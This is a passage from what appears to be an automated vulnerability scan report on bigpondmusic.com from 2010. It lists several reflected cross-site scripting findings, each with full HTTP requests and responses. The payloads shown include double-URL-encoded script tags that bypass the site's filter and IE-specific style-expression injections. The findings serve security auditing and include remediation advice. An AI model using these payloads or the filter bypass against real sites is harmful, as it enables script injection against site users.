The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5 was submitted in the REST URL parameter 1. This input was echoed as 5f944"><script>alert(1)</script>a5d020ae3d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5f944"><script>alert(1)</script>a5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house" />
...[SNIP]...

2.39. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fac8e'%3b464820d9d25 was submitted in the REST URL parameter 1. This input was echoed as fac8e';464820d9d25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumfac8e'%3b464820d9d25/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumfac8e';464820d9d25';
   s.prop4 = 'crowded-house';
   s.prop5 = 'the-very-very-best-of-crowded-house';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|'
...[SNIP]...

2.40. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b was submitted in the h parameter. This input was echoed as 54cb1"style="x:expression(alert(1))"deab3ae0b1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style="x:expression(alert(1))"deab3ae0b1b" />
...[SNIP]...

2.41. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82f6a"style="x:expression(alert(1))"0184eb381c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style="x:expression(alert(1))"0184eb381c7=1" />
...[SNIP]...

2.42. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4 was submitted in the REST URL parameter 1. This input was echoed as 7c305"><script>alert(1)</script>a89f56eddf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album7c305"><script>alert(1)</script>a89f56eddf4/enrique-iglesias/euphoria3" />
...[SNIP]...

2.43. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 397dc'%3b4e76ceeb81a was submitted in the REST URL parameter 1. This input was echoed as 397dc';4e76ceeb81a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album397dc'%3b4e76ceeb81a/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87862


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album397dc';4e76ceeb81a';
   s.prop4 = 'enrique-iglesias';
   s.prop5 = 'euphoria3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.44. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e was submitted in the h parameter. This input was echoed as f169e"style="x:expression(alert(1))"07c1ed7cd2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?h=670210759f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124160


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?h=670210759f169e"style="x:expression(alert(1))"07c1ed7cd2e" />
...[SNIP]...

2.45. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 330e0"style%3d"x%3aexpression(alert(1))"04885151f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 330e0"style="x:expression(alert(1))"04885151f99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?330e0"style%3d"x%3aexpression(alert(1))"04885151f99=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124781


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?330e0"style="x:expression(alert(1))"04885151f99=1" />
...[SNIP]...

2.46. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b was submitted in the REST URL parameter 1. This input was echoed as 4e55c"><script>alert(1)</script>9e81b9f299b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4e55c"><script>alert(1)</script>9e81b9f299b/far-east-movement/like-a-g6" />
...[SNIP]...

2.47. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f89c3'%3bd99db4e3abb was submitted in the REST URL parameter 1. This input was echoed as f89c3';d99db4e3abb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumf89c3'%3bd99db4e3abb/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87845


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumf89c3';d99db4e3abb';
   s.prop4 = 'far-east-movement';
   s.prop5 = 'like-a-g6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.48. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 was submitted in the h parameter. This input was echoed as 976ec"style="x:expression(alert(1))"4b08bf62004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?h=744261064976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?h=744261064976ec"style="x:expression(alert(1))"4b08bf62004" />
...[SNIP]...

2.49. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 878a2"style="x:expression(alert(1))"ab522009b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
